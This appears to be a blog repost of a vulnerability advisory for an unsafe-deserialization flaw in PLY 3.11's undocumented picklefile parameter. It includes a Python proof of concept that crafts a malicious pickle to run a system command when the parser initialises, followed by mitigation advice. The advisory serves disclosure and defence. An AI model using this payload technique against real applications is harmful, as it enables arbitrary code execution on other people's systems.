Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

PLY 3.11 Arbitrary Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 30
PLY 3.11 Arbitrary Code Execution
PLY 3.11 Arbitrary Code Execution
PLY 3.11 Arbitrary Code Execution

# ? Undocumented Remote Code Execution PLY 3.11 Arbitrary Code Execution

# ? Undocumented Remote Code Execution in PLY CVE?2025?56005

```
CVE ID: CVE?2025?56005
Reported by: Ahmed Abd
Disclosure Date: July 1, 2025
Affected Product: PLY (Python Lex?Yacc)
Affected Version: 3.11 (PyPI distribution)
Vendor: PLY (Python Lex?Yacc)
Affected Component:** ply/yacc.py` ? `LRTable.read_pickle()` via `yacc(picklefile=...)`

```
## Summary

An undocumented and unsafe feature in the PyPI?distributed version of **PLY 3.11** allows **arbitrary code execution** when the `yacc()` function is invoked with the `picklefile` parameter.

The `picklefile` parameter causes PLY to deserialize a `.pkl` file using Python?s `pickle.load()` **without validation**. Because Python?s `pickle` module supports execution of arbitrary code during deserialization (e.g., via `__reduce__()`), an attacker who can control the supplied pickle file can execute arbitrary code during parser initialization.

This parameter is **not documented** in the official PLY documentation or GitHub repository, yet it is active in the PyPI release.

---

## Impact

attacker can control, replace, or influence the `.pkl` file passed to `yacc(picklefile=...)`, they can achieve:

* Arbitrary code execution
* Execution during application startup
* Code execution before any parsing logic is reached

This may affect applications that load parser tables from:

* Cached locations
* Shared directories
* CI/CD pipelines
* Configurable or writable paths

---

## ? Vulnerability Details

* **Vulnerability Type:** Arbitrary Code Execution
* **Attack Type:** Context?dependent
* **Attack Vector:** Unsafe deserialization of attacker?controlled pickle file
* **Impact:** Code execution
* **CWE:** CWE?502 (Deserialization of Untrusted Data)

### Affected Functionality

* `ply.yacc.yacc(picklefile=...)`
* `LRTable.read_pickle()` in `ply/yacc.py`

---

## Additional Information (Context & Risk)

This vulnerability presents elevated risk due to its **stealthy nature** and potential for **persistence**.

The `picklefile` parameter is **undocumented** in the official PLY documentation and GitHub repository. However, the PyPI?distributed version of PLY 3.11 includes this functionality and processes the supplied file using `pickle.load()` without validation.

Because Python?s `pickle` module permits execution of embedded code during deserialization, a malicious pickle file can execute arbitrary code **during parser setup**, before any parsing logic is invoked.

At the time of writing, the maintainer has not publicly acknowledged this behavior.

This functionality can be abused to introduce **persistent backdoors**, particularly in environments where parser table files are:

* Cached on disk
* Shared between users or services
* Generated or reused in CI/CD pipelines
* Loaded from configurable or writable paths

Given the lack of documentation, silent execution path, and the high impact of unsafe deserialization, a CVE assignment is warranted to raise awareness and protect downstream users.

---

## Proof of Concept (PoC)

This proof of concept demonstrates arbitrary code execution when a malicious pickle file is supplied via the undocumented `picklefile` parameter.

### PoC Overview

The PoC:

* Defines a minimal lexer and parser
* Crafts a malicious pickle payload
* Executes a system command during deserialization

### Expected Result

When `yacc(picklefile='exploit.pkl')` is invoked, arbitrary code is executed during parser initialization.

```python
import pickle
import os
from ply.lex import lex
from ply.yacc import yacc

tokens = ('EXAMPLE',)

def t_EXAMPLE(t):
r'example'
return t

def p_sample(p):
'sample : EXAMPLE'
pass

class Exploit:
def __reduce__(self):
cmd = 'touch /tmp/pwned && echo "VULNERABLE" > /tmp/pwned'
return (os.system, (cmd,))

malicious_data = {
'_tabversion': '3.11',
'_lr_action': {0: {}},
'_lr_goto': {0: {}},
'_lr_productions': [
(None, 0, 0, 0, Exploit())
],
'_lr_method': 'LALR'
}

with open('exploit.pkl', 'wb') as f:
pickle.dump(malicious_data, f)

parser = yacc(picklefile='exploit.pkl', debug=False, write_tables=False)
parser.parse('example')
```

---

## Mitigation

* Do **not** use the `picklefile` parameter with untrusted or externally writable files
* Avoid loading parser tables from user?controlled locations
* Treat all pickle files as **unsafe input**
* Prefer regenerating parser tables rather than loading them from disk

---


## References

* PLY GitHub Repository: [https://github.com/dabeaz/ply](https://github.com/dabeaz/ply)
* PyPI Package: [https://pypi.org/project/ply/](https://pypi.org/project/ply/)
* Python Pickle Documentation: [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)
* Proof of Concept Repository:
[https://github.com/bohmiiidd/Undocumented-RCE-in-PLY](https://github.com/bohmiiidd/Undocumented-RCE-in-PLY)

Social Media Share